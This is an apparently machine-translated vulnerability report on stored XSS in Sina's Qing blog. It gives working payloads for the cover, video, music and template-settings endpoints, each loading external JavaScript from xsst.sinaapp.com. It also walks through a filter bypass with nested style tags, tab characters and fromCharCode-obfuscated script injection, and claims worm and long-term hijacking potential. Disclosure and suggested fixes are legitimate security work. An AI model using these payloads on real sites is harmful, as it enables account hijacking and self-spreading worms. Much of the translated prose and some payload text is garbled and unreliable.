Sina light blog xss retest

Last night, I re-tested the function of qingbo.
 
Blog, photo, music, and video functions. There are three functions that can lead to storage-type XSS. Can cause worms.
 
In addition, the [template settings] may also lead to stored XSS, and may cause users to be hijacked for a long time.
In general, after the previous BUG was submitted, the loose blog filtered the double quotation marks.
 
However, in the front-end, the light blog does not directly output content, but is output through. innerHTML = "content.
 
In this case.
 
. InnerHTML = ' ';
 
And
 
. InnerHTML = ' ';
 
Is equivalent.
 
The developer only filters the double quotation marks instead of the double quotation marks, which leads to the occurrence of the following three XSS.
 
 
1. XSS for blog posts. Cover Parameter not filtered
 
Http://qing.weibo.com/blog/api/artpost.php
 
POST (only the defect parameters are provided, and other parameters can be used by default)
Cover http://ww3.sinaimg.cn/mw600/a7ff28"80jw1dtlhke6xkjj.jpg/onerror="Utils.Io.JsLoad.request (& # x27; // xsst.sinaapp.com/m.js&#x27 ;)
 
 
The above code calls external JS.
 
--------------------------------------------
 
2. Publish the video XSS. The swf parameter is not filtered.
 
Http://qing.weibo.com/blog/api/videopost.php
 
POST (only the defect parameters are provided, and other parameters can be used by default)
Swf
Dependencies> <. swf
 
 
The above code calls external swf
 
--------------------------------------------
 
3. Publish music XSS. The specified URL parameter is not filtered.
 
The screen parameter in the music function was made by WOOYUN others (http://www.wooyun.org/bugs/wooyun-2010-03926 ).
 
Therefore, I did not test this parameter. Instead, I directly tested other parameters and found that the consumer URL was not filtered.
 
Http://qing.weibo.com/blog/api/musicpost.php
Www.2cto.com
POST (only the defect parameters are provided, and other parameters can be used by default)
URLs http://t.cn/zODGJj8'&quot;onload=&quot;Utils.Io.JsLoad.request (& # x27; // xsst.sinaapp.com/m.js&w.x27;) & quot; a = & quot;
 
 
Give a graph:
 
 
 
 

--------------------------------------------
 
4. XSS in template settings.
 
This is a bit interesting. We set the template as the [diary] template!
 
Capture the package and obtain the following content.
 
Css_data image: Upload background image: http % 3A // background | color: Background color: % 23fff | color: text color: % 23333 | color: text link color: % 23542B10
 
 
You can see that there is a background image address in the POST data, and then view the source code of Weibo. You can see that the background address is output in the following position:
 
<Style type = "text/css">
Body {background: # cfcfcf url (http://simg.sinajs.cn/xblogtheme/images/1/1_5/body.png) repeat; color: #333333 ;}
 
....
</Style>
 
 
Can we modify this background address?
 
After testing, the address cannot contain ",", <,>, and other characters. The system will prompt "incorrect image address"
 
However, if it is replaced by & quot;, the image is not prompted, but the double quotation marks are also filtered out.
 
However, if it is input & # x61;, it is converted to a in the output;
 
Based on the above, we can introduce the following backend logic:
 
Logic 4-1
 
A. convert HTML entities such as & quot; & nbsp; to the original character
B. filter out the double quotation marks, single quotation marks, spaces, and other special characters in the original character.
C. determine whether or not it still contains special characters. If yes, an error is returned, but "&" is not listed as a special character here.
 
 
At first, I just wanted to use expression in CSS, but I think this method is limited to IE6, 7, and 8. It is not fun .. So continue the following test to see if you can enter a </style> to close the css and insert your own HTML code.
 
A. the test has found that, <,> is filtered
B. Even if you use & # x3C; & # x3E;, an error is returned!
C. however, when I directly </style> close the css content, I accidentally find that the </style> is filtered out and no prompt is displayed <,> the same error. This indicates that, </style> indicates that the priority of the replace is greater than <,>.
D. based on C, I came up with the & # x <style> 3C; method. In this way, we can avoid the first step in logic 4-1, replace <style> get & # x3C; I just guessed it at first & # x3C, but the result is output <.. it seems that there are still some steps in the logic, but that is not what I care about. Now that we can output <, we can build the following code and try to output </style>
 
& # X <style> 3C;/style & # x <style> 3E;
 
 
E. Result... it is still a tragedy, and it is filtered out as null again. Therefore, it must be a circular judgment. However, since it is used to filter </style>, it is not necessarily used to filter out the format of </style blank characters>, because spaces are filtered out, the blank characters here are replaced by tabs (0x09 ). So we have the following form.
 
& # X <style> 3C;/style & # x <style> 09; & # x <style> 3E;
 
 
F. This time, </style> is successfully output, and the css code is closed.
 
G. Based on the above steps, we can further construct the entire image code.
 
Http % 3A // a.com/) & # x <style> 3C;/style & # x <style> 09; & # x <style> 3E; & # x <style> 3C; img/src & # x <style> 3D; 1 & # x <style> 09; onerror & # x <style> 3D; Utils. io. jsLoad. request (/& # x <style> 5C;/& # x <style> 5C;/xsst.sinaapp.com & # x <style> 5C;/m. js /. source) & # x <style> 3E;
 
 
H. The above is only the test code. Because the style is located before all called JS, we cannot use the Utils library provided by sina. Finally, we construct the POST usage data as follows:
 
Http://qing.weibo.com/blog/api/mytplpost.php
POSTDATA (only list defect parameters)
 
Css_data
 
Image: Upload background image: http % 3A // a.com/) & # x <style> 3C;/style & # x <style> 09; & # x <style> 3E; & # x <style> 3C; img/src & # x <style> 3D; 1 & # x <style> 09; onerror & # x <style> 3D; (function () & # x <style> 7B; window. s = document. createElement (String. fromCharCode (115,99, 114,105,112,116); window. s. type = String. fromCharCode (116,101,120,116, 47,106, 97,118, 97,115, 99,114,105,112,116); window. s. src = String. fromCharCode (104,116,116,112, 47,120,115,115,116, 46,115,105,110, 112,112, 111,109, 47,109, 46,106,115,); document. body. appendChild (window. s); & # x <style> 7D;) () & # x <style> 3e0000a.png | color: Background color: % 23fff | color: text color: % 23333 | color: text Link color: % 23542B10
 
 
I. After submission, Chrome will view the output.
 
 
 


 
J: For the effect, see the vulnerability proof.
Proof of vulnerability:
1. The first three places can cause worms.
 
2. The last part is to refine the Code to ensure that the victim user is hijacked for a long time when the user's template is still valid.
 
3. The window is long. I will not cut a graph for each other.
 
 
Solution:
1. The first three problems are the same. When innerHTML is used for output, & replace into & amp;
 
2. The last one .. The filtering logic is too complicated. Even if a custom background is provided, you can control the image address in your domain, for example, http://www.sinaimg.cn/userid/xxxxx.jpg. then, you can only filter the content of xxxxx.

Author: gainover